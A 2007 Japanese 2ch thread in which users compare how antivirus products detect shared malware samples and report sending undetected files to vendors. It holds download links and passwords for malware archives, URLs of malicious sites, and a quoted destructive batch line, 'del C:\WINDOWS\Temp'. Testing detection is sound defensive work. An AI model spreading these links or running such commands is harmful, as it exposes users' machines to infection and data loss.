オツカレさま!!!
avast!検出せず・・・

提出しました。

887 :名無しさん@お腹いっぱい。:2007/09/20(木) 09:16:36
>>882
AVG IS
Virus identified Obfustat.PIZ 検出

888 :名無しさん@お腹いっぱい。:2007/09/20(木) 09:49:43
>>882
McAfeeスルーヽ(`Д´)ノ

889 :名無しさん@お腹いっぱい。:2007/09/20(木) 14:55:37
>>882
bitdefender一個検出

890 :名無しさん@お腹いっぱい。:2007/09/20(木) 16:48:38
>>882
乙です
Norton Internet Security 2008 反応無し
Symantecへ贈っておきました

891 :名無しさん@お腹いっぱい。:2007/09/20(木) 20:47:46
>>882
ノートン対応
\IMG09-18.jpeg-www.photoupload.com

コンピュータ:
結果: このファイルの検出結果 W32.Spybot.Worm. http://www.symantec.com/avcenter/venc/data/w32.spybot.worm.html

892 :名無しさん@お腹いっぱい。:2007/09/20(木) 21:27:47
Kazaa板キンタマってとこか
BOT機能あるからP2P以外でも利用する意味があるわけね。

893 :名無しさん@お腹いっぱい。:2007/09/22(土) 13:58:03
ttp://www5.uploader.jp/dl/tane/tane_uljp00135.zip.html
Pass: Malware-Pack3

いろいろ詰め合わせ
McAfeeには提出済み

894 :名無しさん@お腹いっぱい。:2007/09/22(土) 14:18:59
>>393
2\JsT.js : JS_AGENT.UHI
6\sina.htm : TROJ_Generic
9\sys614.htm : JS_DLOADER.PUX
b\soft.exe : TROJ_DLOADER.QDI
残りは送付済み

895 :894:2007/09/22(土) 14:19:46
>>894
はウイルスバスター2007です。

896 :名無しさん@お腹いっぱい。:2007/09/22(土) 15:15:36
あらら、virustotalからSymantecが無くなってるる。。。

>>893
ノートン反応
\b\soft.exe は Downloader ウィルスに感染しています。

無反応分、シマンテックに検体送付しました。

897 :名無しさん@お腹いっぱい。:2007/09/22(土) 17:28:04
カスペ7
0 Trojan-Downloader.VBS.Agent.eg
1 Trojan-Downloader.VBS.Agent.ef
2 Trojan-Downloader.VBS.Agent.ee
4 Trojan-Downloader.VBS.Agent.eh
5 Trojan-Downloader.VBS.Agent.ed
6 Trojan-Downloader.VBS.Agent.ec
7 Trojan-Downloader.JS.Agent.rd
8 Trojan-Downloader.JS.Agent.nv
8 Trojan-Downloader.JS.Psyme.nv
c Trojan-Downloader.JS.Agent.rc

898 :名無しさん@お腹いっぱい。:2007/09/22(土) 18:32:03
>>893
897を訂正すると、

×8 Trojan-Downloader.JS.Psyme.nv
○9 Trojan-Downloader.JS.Psyme.nv
の誤り

b detected: virus Heur.Trojan.Generic (modification) File: tane_uljp00135.zip/malware/b/soft.exe(ヒューリスティック検知)

未検知分は、検体提出。

899 :名無しさん@お腹いっぱい。:2007/09/22(土) 20:45:54
>>893
まいど乙

AVIRA Antivir PEC

検出分
0\index.htm: HEUR/Exploit.HTML
1.htm: HEUR/Exploit.HTML
4\flash.js: HEUR/Exploit.HTML
5\index.htm: HEUR/Exploit.HTML
6\sina.htm: HTML/Dldr.Sina
9\sys614.htm: EXP/WMPload.A
b\soft.exe: TR/Dldr.Versie.1

未検出分送致スミ

900 :名無しさん@お腹いっぱい。:2007/09/22(土) 21:02:38
>>893
ウイルスキラー
1\1.htm
Trojan.DL.VBS.Small.ez
5\index.htm
Trojan.DL.VBS.Agent.xhd
6\sina.htm
Trojan.DL.VBS.Agent.xfq

901 :898:2007/09/22(土) 22:22:29
3について、白の返事

Hello,

s_14_0

No malicious code was found in this file.

Please quote all when answering.


bについてシグネチャに変更

Trojan program Trojan-Downloader.Win32.Delf.cex

902 :名無しさん@お腹いっぱい。:2007/09/22(土) 23:49:29
>>893
AVG IS
0 Downloader.Agent.m
4 Virus found JS/Downloader.Agent
5 Downloader.Agent.m
6 Downloader.Small.dk
8 Virus found JS/Downloader.Agent
b Trojan horse Generic7.QVB
c Virus found JS/Downloader.Agent

903 :名無しさん@お腹いっぱい。:2007/09/23(日) 12:57:32
キング
malware\b\soft.exe 
Win32.Troj.OnLineGames.sj.37888


904 :名無しさん@お腹いっぱい。:2007/09/23(日) 14:02:20
KINGやるぅ〜

905 :名無しさん@お腹いっぱい。:2007/09/23(日) 14:16:28
>>898

>b detected: virus Heur.Trojan.Generic (modification) File: tane_uljp00135.zip/malware/b/soft.exe(ヒューリスティック検知)

カスペ7 ヒューリスティックちゃんと動作するんだな
積極的な効き味ではないみたいだけど・・・
堅実な方向に振っているな

906 :名無しさん@お腹いっぱい。:2007/09/23(日) 14:29:31
カスペ厨必死だねw

907 :名無しさん@お腹いっぱい。:2007/09/23(日) 14:35:08
s_14_0を獄窓につっこんでも?としか表示されない
ヘッダを見ると.exeらしいんだが どういうこと?

908 :名無しさん@お腹いっぱい。:2007/09/23(日) 15:50:21
ttp://zero.bestmanage3.org/framecj.php?aff_id=5024.zip
pass:virus

909 :名無しさん@お腹いっぱい。:2007/09/23(日) 16:07:27
>>908
踏んだらカスペが鳴きっぱなしだった

910 :名無しさん@お腹いっぱい。:2007/09/23(日) 16:12:30
>>908
ノートン・ファイター大激怒

911 :名無しさん@お腹いっぱい。:2007/09/23(日) 16:15:45
>>908
http://85.255.116.234/8.htm
ここに飛ばされるね
ちょっとびっくりした
http://so.7walker.net/index.php?http%3A%2F%2F85.255.116.234%2F8.htm

912 :名無しさん@お腹いっぱい。:2007/09/23(日) 16:31:46
これかぁ
営業企画お尻に火がついた戦士ノートン・ファイター
ttp://news.google.com/news?q=%E3%83%8E%E3%83%BC%E3%83%88%E3%83%B3%E3%83%BB%E3%83%95%E3%82%A1%E3%82%A4%E3%82%BF%E3%83%BC&hl=ja&client=opera&rls=en&hs=UoL&um=1&ie=UTF-8&sa=X&oi=news_result&resnum=1&ct=title

913 :名無しさん@お腹いっぱい。:2007/09/23(日) 16:42:42
ノートン・ファイター
http://internet.watch.impress.co.jp/cda/news/2007/09/22/16970.html

914 :名無しさん@お腹いっぱい。:2007/09/23(日) 16:52:08
>>908
inhoster.com

915 :名無しさん@お腹いっぱい。:2007/09/23(日) 17:08:56
http://www.dotup.org/uploda/www.dotup.org2502.rar.html
virus
ノートン送付済み

916 :名無しさん@お腹いっぱい。:2007/09/23(日) 17:12:48
inst.exe
おちんぽ!!!!!おちんぽ!!!!!!!!!!

うせろ。

917 :名無しさん@お腹いっぱい。:2007/09/23(日) 17:16:11
>>915
バスタースルー

918 :名無しさん@お腹いっぱい。:2007/09/23(日) 17:23:52
Microsoft 1.2803 2007.09.23 password protected
NOD32v2 2545 2007.09.23 the file is probably password protected.

パスワードなんて掛かってないのに・・・・2つだけおバカメッセージを出した以外は無反応かあ。

919 :名無しさん@お腹いっぱい。:2007/09/23(日) 17:26:05
新種か
カスペに送っておきます

920 :名無しさん@お腹いっぱい。:2007/09/23(日) 17:29:10
>>915
d。
カスペ7 スルー
VTでも反応しないみたいだがだが。

921 :918:2007/09/23(日) 17:29:22
すまん、バカは俺だった。いってくる・・・・

922 :名無しさん@お腹いっぱい。:2007/09/23(日) 18:29:45
>>893
Risingより
   1.文件名:index.htm
   病毒名:Trojan.DL.Script.JS.Agent.lht
   2.文件名:JsT.js
   病毒名:Trojan.DL.Script.JS.Agent.lhx
   3.文件名:s_14_0
   不是病毒
   4.文件名:flash.js
   病毒名:Trojan.DL.Script.JS.Agent.lhy
   5.文件名:index.htm
   病毒名:Trojan.DL.Script.JS.Agent.lhw
   6.文件名:bodg.htm
   病毒名:Trojan.DL.Script.JS.Agent.lhv
   7.文件名:sys614.htm
   病毒名:Trojan.DL.Script.JS.Agent.a
   8.文件名:Pic368.gif
   不是病毒
   9.文件名:soft.exe
   病毒名:Trojan.DL.Win32.Autorun.ytd
   10.文件名:smss.htm
   病毒名:Trojan.DL.Script.JS.Agent.lhu

>>915
キラースルー

923 :名無しさん@お腹いっぱい。:2007/09/23(日) 18:40:56
>>915
AVGスルー

924 :名無しさん@お腹いっぱい。:2007/09/23(日) 18:42:13
>>915
McAfeeもいつも通りスルー

925 :名無しさん@お腹いっぱい。:2007/09/23(日) 18:42:29
>>915
カスペから反応来た
>No malicious code was found in this file.
>Please quote all when answering.

926 :名無しさん@お腹いっぱい。:2007/09/23(日) 19:39:54
NOD32スルー

927 :名無しさん@お腹いっぱい。:2007/09/23(日) 20:08:20
>>915
AntiVir スルー

928 :名無しさん@お腹いっぱい。:2007/09/23(日) 20:12:27
>>908
ZoneAlarmPROアンチスパイウェアが、サイトに接続をブロック

929 :名無しさん@お腹いっぱい。:2007/09/23(日) 20:24:32
>>908
キングじゃ怖くて踏めません

930 :名無しさん@お腹いっぱい。:2007/09/23(日) 20:49:38
>>908
馬鹿野郎!zipだと安心してリカバリ完了後の穴だらけPCで
踏んじゃったジャマイカ!

931 :930:2007/09/23(日) 20:51:31
案の定変なプロセス動いてますた('・ω・)

932 :名無しさん@お腹いっぱい。:2007/09/23(日) 20:59:37
怒った後、急に静かに… カワイソスw

933 :930:2007/09/23(日) 21:12:45
あやしいファイルひとまとめにして検体にします(・ω・)ノ
from 第二号機PC

934 :930:2007/09/23(日) 22:20:22
駆除作業完了!って思った矢先これですか・・・('・ω・)
ttp://www.dotup.org/uploda/www.dotup.org2682.png

935 :930:2007/09/23(日) 22:26:19
ダウソパス sec
zipパス fuzakenji
ttp://www.dotup.org/uploda/www.dotup.org2686.zip.html

もうリカバリします('・ω・)

936 :名無しさん@お腹いっぱい。:2007/09/23(日) 22:53:33
>>915
あほかっ!!!
ただのテキストファイルだろーが。

937 :八頭:2007/09/23(日) 22:57:10
YouTube - Cheap Trick
ttp://www.youtube.com/watch?v=dxqsCnpNUPA


938 :名無しさん@お腹いっぱい。:2007/09/23(日) 22:59:44
嗚呼、916が見えないw

939 :名無しさん@お腹いっぱい。:2007/09/23(日) 23:01:16
>>915
>>936確認
釣られた。。。

>>916
見落としてたよ

940 :名無しさん@お腹いっぱい。:2007/09/24(月) 12:55:06
>>935
[!] ファイルがありません
www.dotup.org2686.jpg----./uploda/www.dotup.org2686.jpg_/www.dot... ファイルが存在しません。

941 :名無しさん@お腹いっぱい。:2007/09/24(月) 16:16:40
>>908
キングで反応あり
RISK.Exploit.Ani

942 :名無しさん@お腹いっぱい。:2007/09/24(月) 18:48:14
Is the Wildlist still relevant?
http://www.sophos.com/security/blog/2007/09/594.html

今更w

943 :名無しさん@お腹いっぱい。:2007/09/25(火) 07:42:31
ttp://www.perfect-av.com/top/?landing=1007

本日の動画!!をクリックして反応有ればAVが正常だと思うんだけど
どう?

944 :名無しさん@お腹いっぱい。:2007/09/25(火) 08:13:40
Avira AntiVir PersonalEdition Classic

--> PerfectAV.exe
[DETECTION] Is the Trojan horse TR/VB.awc.14

PerfectAV.exeがDLされてくるけど、途中で反応した

945 :名無しさん@お腹いっぱい。:2007/09/25(火) 08:20:24
>>943
マカフィー
検出:PWS-Hachilem

946 :名無しさん@お腹いっぱい。:2007/09/25(火) 08:42:30
>>943
キング反応なし

947 :名無しさん@お腹いっぱい。:2007/09/25(火) 08:43:34
>>943
EsetSmartSecurityのβ版
反応なし

948 :名無しさん@お腹いっぱい。:2007/09/25(火) 09:08:39
>>943
ウイルスキラー
Trojan.PSW.VB.ado

949 :名無しさん@お腹いっぱい。:2007/09/25(火) 11:50:04
>>943
Norton Internet Security 2008
Trojan.Hachilem!gen として検出


950 :名無しさん@お腹いっぱい。:2007/09/25(火) 12:09:16
>>943
ウイルスバスター2007
TSPY_VB.DTV

951 :名無しさん@お腹いっぱい。:2007/09/25(火) 17:46:35
>>943
avast! 4.7 Home Edition
Win32:VB-ERE [Trj]

952 :名無しさん@お腹いっぱい。:2007/09/25(火) 20:09:23
>>943
カスペ7 Web-AV
detected: Trojan program Trojan.Win32.VB.awc URL: http://www.perfect-av.com/download///UPX


ちんぽは反応せず。

953 :名無しさん@お腹いっぱい。:2007/09/25(火) 20:42:34
直リン貼るなボケ

954 :名無しさん@お腹いっぱい。:2007/09/25(火) 21:52:24
>>943 PerfectAV.exe ttp://www.virustotal.com/resultado.html?4d9a0d3f0c2992d4c363c353488d1189
AhnLab-V3 2007.9.22.0 2007.09.24 Win-Trojan/Xema.variant
AntiVir 7.6.0.15 2007.09.25 TR/PSW.VB.KB.17
Authentium 4.93.8 2007.09.25 W32/PWStealer.KEN
Avast 4.7.1043.0 2007.09.24 Win32:Trojan-gen. {VB}
AVG 7.5.0.485 2007.09.25 PSW.Generic4.JOG
BitDefender 7.2 2007.09.25 Trojan.Pws.Vb.KB
ClamAV 0.91.2 2007.09.25 Trojan.Spy-7188
DrWeb 4.33 2007.09.25 BackDoor.Generic.1485
eSafe 7.0.15.0 2007.09.23 Win32.VB.kb
Ewido 4.0 2007.09.24 Trojan.VB.kb
Fortinet 3.11.0.0 2007.09.25 W32/VB.KB!tr.pws
F-Prot 4.3.2.48 2007.09.25 W32/PWStealer.KEN
F-Secure 6.70.13030.0 2007.09.25 Trojan-PSW.Win32.VB.kb
Ikarus T3.1.1.12 2007.09.25 Trojan.Win32.VB.awc
Kaspersky 4.0.2.24 2007.09.25 Trojan-PSW.Win32.VB.kb
McAfee 5126 2007.09.24 PWS-Hachilem
Microsoft 1.2803 2007.09.25 PWS:Win32/VB!2DD2
NOD32v2 2549 2007.09.25 probably a variant of Win32/PSW.VB.FS
Norman 5.80.02 2007.09.25 W32/VBTroj.GLS
Panda 9.0.0.4 2007.09.25 Suspicious file
Rising 19.42.11.00 2007.09.25 Trojan.PSW.VB.ado
Sophos 4.21.0 2007.09.25 Mal/Generic-A
Sunbelt 2.2.907.0 2007.09.25 Trojan.Hachilem!gen
Symantec 10 2007.09.25 Trojan.Hachilem!gen
TheHacker 6.2.5.068 2007.09.25 Trojan/PSW.VB.kb
VBA32 3.12.2.4 2007.09.25 Trojan-PSW.Win32.VB.kb
VirusBuster 4.3.26:9 2007.09.24 Trojan.PWS.VB.FBV
Webwasher-Gateway 6.0.1 2007.09.25 Trojan.PSW.VB.KB.17
File size: 360448 bytes MD5: d22d964eec6dcb52e77f9c41cec9b4e3 SHA1: 016df57660879197ae3532491f23313779b59bc0
Result: 28/32 (87.5%) スルー CAT-QuickHeal eTrust-Vet FileAdvisor Prevx1
>>946 キングに送っておいた。

955 :名無しさん@お腹いっぱい。:2007/09/25(火) 23:36:03
>>943
NOD32なんだけど、ふつーにDLできちゃうしデスクトップ上の
「PerfectAV.exe」を選択して右クリックからスキャンしても無反応。。。なんで?
virustotal.comでは対応済になってるみたいだけど。
BitDefender v10でも同様に無反応。
AVGでは検出&削除できるからDLミスってこともない。

956 :名無しさん@お腹いっぱい。:2007/09/25(火) 23:57:02
NODはよく知らないがヒューリスティックで検知してるみたいだから
ヒューリスティックの設定がわるいんじゃないか?

957 :名無しさん@お腹いっぱい。:2007/09/26(水) 00:53:44
>>955
アップデートしてないんじゃない?
朝の時点ではBitDefenderとNODは対応してなかった

958 :名無しさん@お腹いっぱい。:2007/09/26(水) 03:03:45
ワロタ

959 :名無しさん@お腹いっぱい。:2007/09/26(水) 06:19:50
■■■■■■○○○○○○○○○○○○○○○
■○○○○■○■■■■■○○○■■■■■○
■○○○○■○■○○○■○○○○○○○■○
■○○○○■○■○○○■○○○○○○■○○
■○○○○■○■○○○■○○○○○○■○○
○○○○■○○■○○○■○○○○○■○○○
○○○○■○○■○○○■○○○○○■■○○
○○○■○○○■○○○■○○○○■○○■○
○○○■○○○■■■■■○○○■○○○○■
○○■○○○○■○○○■○○■○○○○○○
○○○○○○○○○○○○○○○○○○○○○
○○○○○○○○○○○○○○○○○○○○○

960 :名無しさん@お腹いっぱい。:2007/09/26(水) 09:45:28
ttp://www5.uploader.jp/dl/tane/tane_uljp00138.zip.html
pass: Malware-Pack4

いろいろ詰め合わせ
McAfeeには提出済み

961 :名無しさん@お腹いっぱい。:2007/09/26(水) 10:41:03
>>960
Avira AntiVir V7.00.00.14

1.js
121.exe
gmsex.exe
spb40.exe
tool.js

上記未検出につき提出済み。

962 :名無しさん@お腹いっぱい。:2007/09/26(水) 11:01:37
Avira 一応
--> malware\0\51-70.pif
[DETECTION] Contains detection pattern of the HEUR-DBLEXT/Crypted virus
--> malware\1\setup.exe
[DETECTION] Contains a detection pattern of the (dangerous) backdoor program BDS/Hupigon.dsx.243 Backdoor server programs
--> malware\3\mminstall.exe
[DETECTION] Is the Trojan horse TR/Spy.Banker.TW.116
--> malware\4\bf.htm
[DETECTION] Contains detection pattern of the Java script virus JS/Agent.EP
--> malware\5\ysydown.cab
[1] Archive type: CAB (Microsoft)
--> ysydown.exe
[DETECTION] Contains detection pattern of the dropper DR/Drop.Agent.amm.100
--> malware\6\player.exe
[DETECTION] Is the Trojan horse TR/Delphi.Downloader.Gen
--> malware\7\vip.exe
[DETECTION] Is the Trojan horse TR/Delphi.Downloader.Gen

963 :名無しさん@お腹いっぱい。:2007/09/26(水) 11:05:08
>>960
avast!(´;ω;`)シクシク
http://nekomimi.ws/~ro/img/1021.jpg

964 :名無しさん@お腹いっぱい。:2007/09/26(水) 11:24:49
>>963
ウンコ発見

965 :名無しさん@お腹いっぱい。:2007/09/26(水) 12:01:01
>>960
d
カスペ7
8/12 (5,6はヒューリスティック)
検体提出

detected: Trojan program Trojan-PSW.Win32.OnLineGames.dij File:0/51-70.pif//PE_Patch.PECompact//PecBundle//PECompact
detected: malware not-virus:Hoax.Win32.Avola.a File:1/setup.exe//PE_Patch.UPX//UPX
detected: Trojan program Trojan-Downloader.Win32.Agent.dlv File:3/mminstall.exe
detected: virus Heur.Invader (modification) File:5/ysydown.cab/ysydown.exe//ASPack
detected: virus Heur.Downloader (modification) File:6/player.exe//PE_Patch.UPX
detected: Trojan program Trojan-Spy.Win32.Agent.abv File:7/vip.exe//PE_Patch//UPack
detected: Trojan program Trojan-PSW.Win32.OnLineGames.dor File:8/gmsex.exe
detected: Trojan program Trojan-Downloader.JS.Agent.oq File:9/1.js//JSPack

966 :名無しさん@お腹いっぱい。:2007/09/26(水) 12:23:07
>>960
AVG Anti-Malware

0\51-70.PIF
Trojan horse PSW.Lineage.AAV
1\setup.exe
Trojan horse SHeur.OGX
2\121.exe
Trojan horse Downloader.Generic6.HYO
3\MMINSTALL.EXE
Trojan horse Generic7.UAP
4\bf.htm
Downloader.Agent.fm
5\ysydown.cab
Trojan horse Downloader.Generic6.JJH
6\PLAYER.EXE
Trojan horse Generic8.AAX
7\VIP.EXE
Trojan horse Generic7.ZMC
8\GMSEX.EXE
Trojan horse Generic7.ZMG

9 a bはスルーしたので送ります

967 :名無しさん@お腹いっぱい。:2007/09/26(水) 12:30:17
AVGすげー

968 :名無しさん@お腹いっぱい。:2007/09/26(水) 12:33:58
>>960乙です
Norton Internet Security 2008
/1/setup.exeを Awola として検出
/2/121.exe Downloader として検出
/3/mminstall.exe Trojan.Farfli として検出
その他は反応無しなので贈っておきます

969 :名無しさん@お腹いっぱい。:2007/09/26(水) 12:56:51
>>960
McAfee完全スルー

970 :名無しさん@お腹いっぱい。:2007/09/26(水) 14:58:59
>>960
ウイルスバスター2007
51-70.pif
TSPY_WOWSTEAL.CN

ysydown.cab
TROJ_SMALL.IMH

vip.exe
TROJ_DELF.IVK

gmsex.exe
Possible_Infostl

残り検体提出します

971 :名無しさん@お腹いっぱい。:2007/09/26(水) 16:09:21
>>960
んー、某資料室の人?

>>963
なんかハクられてね?

972 :名無しさん@お腹いっぱい。:2007/09/26(水) 17:18:25
>>971
いんや、どこの人でもないよ

973 :名無しさん@お腹いっぱい。:2007/09/26(水) 18:02:37
>>972
そか。McAfee使いで中華アカハックトロイばっかだったんで勘違いした。

974 :名無しさん@お腹いっぱい。:2007/09/26(水) 20:37:34
>>960
ウイルスキラー
2\121.exe
Trojan.DL.Win32.Agent.zdy
7\vip.exe>>upack0.36
Trojan.Clicker.Win32.PopHot.bq
8\gmsex.exe
Trojan.PSW.Win32.QMOnline.a

975 :名無しさん@お腹いっぱい。:2007/09/26(水) 20:55:42
次スレどこー??

976 :965:2007/09/26(水) 21:08:56
>>960
カスペ2次報告
9(ほかに2は返事待ち)/11

: Trojan program Trojan-PSW.Win32.OnLineGames.dij File: 0/51-70.pif
: malware not-virus:Hoax.Win32.Avola.a File: 1/setup.exe
: Trojan program Trojan-Downloader.Win32.Hmir.ae File: 2/121.exe(検体提出による追加検出)
: Trojan program Trojan-Downloader.Win32.Agent.dlv File: 3/mminstall.exe
: malware Exploit.JS.Agent.am File: 4/bf.htm(検体提出による追加検出)
: Trojan program Trojan-Downloader.Win32.Delf.cfu File: 5/ysydown.cab/ysydown.exe (シグネチャに変更)
: virus Virus.Win32.AutoRun.pd File: 6/player.exe (シグネチャに変更)
: Trojan program Trojan-Spy.Win32.Agent.abv File: 7/vip.ex
: Trojan program Trojan-PSW.Win32.OnLineGames.dor File: 8/gmsex.exe
: Trojan program Trojan-Downloader.JS.Agent.oq File: 9/1.js
a/tools.js→返事待ち
b/spb40.exe→返事待ち

977 :名無しさん@お腹いっぱい。:2007/09/26(水) 21:13:34
>>975
ここは、どうよ。
糞スレリサイクル。250レスほど余っている。


【NOD厨】検出力調査スレ2【出禁】
http://pc11.2ch.net/test/read.cgi/sec/1177739872/

それとも、新スレ立てた方がいいか?

978 :名無しさん@お腹いっぱい。:2007/09/26(水) 21:24:33
>>977
そこは機能していない。放置でいいと思う。

こっちを再利用するのはいいと思う。
【信者】検出力調査スレ3【禁止】
http://pc11.2ch.net/test/read.cgi/sec/1181836779/

979 :名無しさん@お腹いっぱい。:2007/09/26(水) 21:25:58
キング
0\51-70.pif Win32.Troj.Downloader.ph.110592
一匹
送っておいたお 

980 :名無しさん@お腹いっぱい。:2007/09/26(水) 22:19:04
>>978
そっちの方がいいかも。

981 :名無しさん@お腹いっぱい。:2007/09/26(水) 22:37:24
>>954
(m´・ω・`)m ゴメン…
おいらが、先に送っちゃった

982 :名無しさん@お腹いっぱい。:2007/09/26(水) 22:38:58
423 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2007/09/26(水) 22:06:25
****W32.DarkManko.F****
Winnyなどに出回っている
"めっちゃ臭いやん.avi exe"
というファイルを実行してしまうと感染。

画面上にDarkMankoが張り付きます

427 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2007/09/26(水) 22:23:25
W32.DarkManko.Fの検体入手しますた
http://up-sv.ath.cx/up/1/source3/No_0856.zip


983 :名無しさん@お腹いっぱい。:2007/09/26(水) 22:41:21
>>978
こっちで良いと思う。多分>>977は荒らしで埋まる。

984 :名無しさん@お腹いっぱい。:2007/09/26(水) 22:42:49
>>982
中身はバッチファイルで、
del C:\WINDOWS\Temp
しか書いてない。

985 :名無しさん@お腹いっぱい。:2007/09/26(水) 22:44:59
del C:\WINDOWS\Temp

え?

986 :名無しさん@お腹いっぱい。:2007/09/26(水) 22:46:32
Windowsぶっ壊れるぞ・・・

987 :名無しさん@お腹いっぱい。:2007/09/27(木) 00:06:11
rd /s のほうがry

988 :名無しさん@お腹いっぱい。:2007/09/27(木) 03:01:10
そもそも、DarkManko なんて名前付けないだろ……

989 :名無しさん@お腹いっぱい。:2007/09/27(木) 03:15:04
ume

990 :名無しさん@お腹いっぱい。:2007/09/27(木) 07:57:37
>>986
tempだからいいだろ消えても。

991 :名無しさん@お腹いっぱい。:2007/09/27(木) 19:09:50
ume

992 :名無しさん@お腹いっぱい。:2007/09/27(木) 19:11:13
grrrrrrrrrrr

993 :965:2007/09/27(木) 20:12:05
>>960
>>976の追加報告
a/tool.js, b/spb.40.exeは「白」との返事

Hello,

tool.js_

No malicious code was found in this file.

Please quote all when answering.


Hello,

spb40.exe_

No malicious code was found in this file.

Please quote all when answering.

--
Best regards, Namestnikov Yury
Virus analyst, Kaspersky Lab.
e-mail: newvirus@kaspersky.com
http://www.kaspersky.com/

994 :名無しさん@お腹いっぱい。:2007/09/27(木) 21:36:39
うめ

995 :名無しさん@お腹いっぱい。:2007/09/27(木) 21:41:59


             ∧_ ∧  なにこのスレ
          _ ( ´・ω・`) __
        / ( ( つ┳つノ   \
       /     ̄ ̄ ̄ ̄      ヽ
       |   /         \  |
       |     ●     ●   |
       |                | ころころ〜
       ヽ      (_人_)   ノ
〜〜〜〜  ◎――――――――◎

996 :名無しさん@お腹いっぱい。:2007/09/27(木) 21:42:57


    γ''"""ヽ、
    / / ゚ ▼)  W(`0`)W ガオォー
    し' (,,゚Д゚)
   ノ|(ノ  |)
  ∠,,人,,_,,ノ
     U"U
  _, ,_ ?

997 :名無しさん@お腹いっぱい。:2007/09/27(木) 22:50:59
可愛らしいけどume

998 :名無しさん@お腹いっぱい。:2007/09/27(木) 22:53:06


     ,、‐ " ̄:::゙:丶、  ∩_
  ,r::::l3゙::::::::/ハヽ:ヽ::::、:ヽ〈〈〈 ヽ
  {::://:::::::// ヽ\ト、::::::〈⊃  }
  ヾ l:::::::/ \   `/ヾ ィ、:::|   |
   |;:r::|  ●`   ●ヾハ|   |
    ヽハ:::::      :::レ /   !
     ´\   ・  ,ノヽ   / <これ
       /ヾ ̄下~  |_/
     /ヽ_ _\ .ィ ヽ/
    /       n_n  |
    >、 /_  l゚ω゚| |
   (___)   ̄ |


999 :名無しさん@お腹いっぱい。:2007/09/27(木) 22:54:28
ウッキィー

1000 :名無しさん@お腹いっぱい。:2007/09/27(木) 22:56:29
1000

1001 :1001:Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。

299 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.02 2018/11/22 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)